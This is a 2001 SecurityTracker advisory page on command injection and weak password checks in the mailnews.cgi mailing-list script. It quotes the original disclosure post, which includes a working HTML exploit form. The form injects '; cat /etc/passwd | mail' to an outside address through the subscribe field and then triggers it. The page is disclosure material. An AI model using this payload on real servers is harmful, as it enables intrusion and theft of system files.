SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com






Category:   Application (Web Server/CGI)  >   Mailnews Vendors:   Reuter, Claude
Mailnews Cgi Script May Execute Arbitrary Shell Commands Supplied By Unauthorized Users Via the Network
SecurityTracker Alert ID:  1000949
SecurityTracker URL:  http://securitytracker.com/id/1000949
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Updated:  Feb 28 2001
Original Entry Date:  Feb 21 2001
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 1.1, 1.3
Description:   The cgi-based MAILNEWS mailing list management software reportedly contains several vulnerabilities that allow an attacker to remotely supply shell commands to be executed by the cgi script.

The most potentially serious vulnerability is that the software fails to appropriately filter certain input parameters. This allows an attacker to provide arbitrary shell commands to the cgi script that will be executed by the cgi script. In addition, the script does not properly protect and enforce passwords such that an unauthorized user without knowledge of the administrative password can add or delete users from an affected maillist.

The original message contains demonstration exploit code.

Impact:   An attacker can remotely provide shell commands to be executed by the cgi script with the privileges of the cgi script.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.creuter.lu/programming/perl/index.asp (Links to External Site)
Cause:   Authentication error, Input validation error
Underlying OS:  Linux (Any), Apple (Legacy "classic" Mac), UNIX (Any), Windows (Any)
Underlying OS Comments:  Vulnerable target is a Perl script

Message History:   None.


 Source Message Contents

Subject:  CGI - mailnews.cgi vulnerability...


Hello BuGReaders...

##Script: mailnews.cgi

##Introduction:

<cat from source>
CGI-Script MAILNEWS 1.3
This script helps you to maintain a mailinglist.
</cat>

##Tested Version: 1.1, 1.3

Author dont parse some characters and he use very stupid "password
protection". We can add or delete users from maillist without known
admin password. But this is small problem ;] . Lets see what we can do
more.
<cat source>
	open (MAIL, "|$mailprog $member") || die "Can't open $mailprog!\n";
</cat>
where $mailprog [default] is sendmail and $member is users from usersfile.
Now we can do something like this. Add user "; cat /etc/passwd | mail
adam@malysz.pl' and use subroutine to execute this code :]

Simple exploit in html:

<HTML>
<BODY>
<FORM
ACTION="http://www.adamalysz.com/cgi-bin/mailnews.cgi" METHOD=POST>
<INPUT type=hidden NAME="action" value="subscribe">
<BR>
User to add with ;  [ex:" ; cat /etc/passwd |mail adam@malysz.pl"
without qoutas ofcoz ]<INPUT NAME="address" TYPE="TEXT">
<INPUT  TYPE="SUBMIT" VALUE="Submit">
</FORM>
<BR>
<A HREF="http://www.adamalysz.com./cgi-bin/mailnews.cgi?news">
Execute command :] </A>
<CENTER> Peace... </CENTER>
</BODY>
</HTML>

Who :	Kanedaaa
	kaneda@ac.pl


***$$$###  " I moze bardzo wielu nie zrozumie tych slow...
		Ale nie ma litosci dla SKURWYSYNOW .... " ###$$*
kaneda@ac.pl Bohater ... Szef ... Abuser ... Cucumber Team Member... Bzz..


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

Copyright 2017, SecurityGlobal.net LLC